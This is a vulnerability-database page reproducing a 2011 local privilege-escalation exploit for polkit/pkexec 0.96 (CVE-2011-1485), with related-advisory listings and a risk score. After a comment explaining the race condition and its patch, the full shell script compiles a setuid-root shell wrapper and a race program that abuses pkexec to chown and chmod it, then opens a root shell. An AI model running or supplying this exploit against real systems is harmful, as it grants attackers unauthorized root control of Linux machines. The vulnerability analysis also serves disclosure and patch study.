Linux pkexec / polkitd 0.96 Race Condition

🗓️ 09 Oct 2011 00:00:00Reported by Ev1lut10nType

packetstorm🔗 packetstormsecurity.com👁 69 Views

Linux pkexec / polkitd 0.96 Race Condition Privilege Escalatio

Reporter	Title	Published	Views	Family All 76
0day.today	PolicyKit Pwnage: linux local privilege escalation on polkit-1 <= 0.101	4 Oct 201100:00	–	zdt
0day.today	pkexec Race Condition Privilege Escalation Exploit	7 Oct 201100:00	–	zdt
0day.today	Linux PolicyKit Race Condition Privilege Escalation Exploit	18 Oct 201400:00	–	zdt
ALT Linux	Security fix for the ALT Linux 9 package polkit version 0.101-alt2	25 Apr 201100:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 6 package polkit version 0.101-alt2	25 Apr 201100:00	–	altlinux
BDU FSTEC	Vulnerabilities in the Debian GNU/Linux operating system that allow a malicious individual to compromise the confidentiality, integrity, and accessibility of protected information	6 Jul 201600:00	–	bdu_fstec
BDU FSTEC	Vulnerabilities of the Gentoo Linux operating system, which allow a malicious individual to compromise the confidentiality, integrity, and accessibility of protected information	28 Apr 201500:00	–	bdu_fstec
Circl	CVE-2011-1485	20 Oct 201400:00	–	circl
CVE	CVE-2011-1485	31 May 201120:00	–	cve
Cvelist	CVE-2011-1485	31 May 201120:00	–	cvelist

`#!/bin/sh  
  
<<COMMENT1  
  
Exploit Title: Linux pkexec and polkitd 0.96 race condition privilege escalation  
Date: Sun Oct 9 00:31:10 WIT 2011  
Author: Ev1lut10n   
About Ev1lut10n:  
http://jasaplus.com/ev1lut10n  
A Chinese Man Lives in Indonesia  
Software Link: http://pkgs.fedoraproject.org/repo/pkgs/polkit/polkit-0.96.tar.gz/e0a06da501b04ed3bab986a9df5b5aa2/  
Version: 0.96  
Tested on: 2.6.35-22-generic #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC 2010 i686 GNU/Linux under Gnome Environment  
CVE : CVE-2011-1485  
  
Brief Descriptions  
  
src/polkit/polkitunixprocess.c where it fails to clarify the real uid, under this race condition it will return the effective one.  
on : polkit_unix_process_get_owner (PolkitUnixProcess *process,  
g_snprintf (procbuf, sizeof procbuf, "/proc/%d", process->pid);  
if (stat (procbuf, &statbuf) != 0)  
{  
g_set_error (error,  
POLKIT_ERROR,  
POLKIT_ERROR_FAILED,  
"stat() failed for /proc/%d: %s",  
process->pid,  
g_strerror (errno));  
goto out;  
}  
where the code only rely on stat of the pseudo filesystem   
  
src/polkit/polkitsubject.c ---------> there's not enough validation to run polkit_unix_process_new  
  
on polkit_subject_from_string (const gchar *str,   
there's no enough validation before launching polkit_unix_process_new   
if (g_str_has_prefix (str, "unix-process:"))  
{  
val = g_ascii_strtoull (str + sizeof "unix-process:" - 1,  
&endptr,  
10);  
if (*endptr == '\0')  
{  
subject = polkit_unix_process_new ((gint) val);  
  
the fix is to add more validations (polkit_unix_process_new_for_owner,polkit_unix_process_new_full,polkit_unix_process_new_full):  
  
if (sscanf (str, "unix-process:%d:%" G_GUINT64_FORMAT ":%d", &scanned_pid, &scanned_starttime, &scanned_uid) == 3)  
{  
+ subject = polkit_unix_process_new_for_owner (scanned_pid, scanned_starttime, scanned_uid);  
+ }  
+ else if (sscanf (str, "unix-process:%d:%" G_GUINT64_FORMAT, &scanned_pid, &scanned_starttime) == 2)  
+ {  
+ subject = polkit_unix_process_new_full (scanned_pid, scanned_starttime);  
+ }  
+ else if (sscanf (str, "unix-process:%d", &scanned_pid) == 1)  
+ {  
+ subject = polkit_unix_process  
  
  
src/polkitbackend/polkitbackendsessionmonitor.c  
function polkit_backend_session_monitor_get_user_for_subject (PolkitBackendSessionMonitor  
  
if (POLKIT_IS_UNIX_PROCESS (subject))  
{  
GError *local_error;  
  
local_error = NULL;  
uid = polkit_unix_process_get_owner (POLKIT_UNIX_PROCESS (subject), &local_error);  
  
  
as we may see from above code : "polkit_unix_process_get_owner" will not avoid "Time of Check to Time of Use Problem"   
http://www.usenix.org/events/fast05/tech/full_papers/wei/wei.pdf  
  
  
src/programs/pkexec.c  
pkexec doesn't use the uid of parent process had and will still continue when the parent die :  
  
pid_of_caller = getppid ();  
if (pid_of_caller == 1)  
{  
pid_of_caller = getpgrp ();  
}  
  
subject = polkit_unix_process_new (pid_of_caller);  
  
  
where it will continue even if the parent is dead.  
  
where the patch has been applied by adding prctl to check the death signal of the parent process (PR_SET_PDEATHSIG):  
  
if (prctl (PR_SET_PDEATHSIG, SIGTERM) != 0)  
+ {  
+ g_printerr ("prctl(PR_SET_PDEATHSIG, SIGTERM) failed: %s\n", g_strerror (errno)); /**So if our parent die goto out***/  
+ goto out;  
+ }  
  
  
COMMENT1  
  
  
  
cat > suid.c << _EOF  
#include <stdio.h>  
#include <string.h>  
int main(int argc,char *argv[])  
{  
char *root=malloc(1000);  
char perintah[256]="/bin/sh -c ";  
int i;  
char *spasi=" ";  
strcat(root,perintah);  
for (i=1;i<argc;i++)  
{  
strcat(root,argv[i]);  
strcat(root,spasi);   
}   
setuid(0);  
setgid(0);  
system(root);  
}  
_EOF  
  
  
  
cat > makesuid.c << _EOF  
/**this code was modified from http://www.exploit-db.com/exploits/17932/ by zx2c **/  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sys/types.h>  
#include <sys/inotify.h>  
int main(int argc, char **argv)  
{  
if (fork() != 0)  
{   
int fd;  
char pid_path[15];  
sprintf(pid_path, "/proc/%i", getpid());  
close(0); close(1); close(2);  
fd = inotify_init();  
inotify_add_watch(fd, pid_path, IN_ACCESS);  
read(fd, NULL, 0);  
execl("/usr/bin/X", "X", NULL);   
}   
else  
{  
execl("/usr/bin/pkexec", "pkexec", argv[1],argv[2],argv[3], NULL);  
}  
  
return 0;  
}  
  
_EOF  
  
  
gcc -o /tmp/suid suid.c  
gcc -o makesuid makesuid.c  
./makesuid chown root:root /tmp/suid  
./makesuid chmod u+s /tmp/suid  
echo "your suid is on /tmp/suid make sure u move this !!!"  
/tmp/./suid -c /bin/sh  
`

09 Oct 2011 00:00Current

6.5Medium risk

Vulners AI Score6.5

EPSS0.05246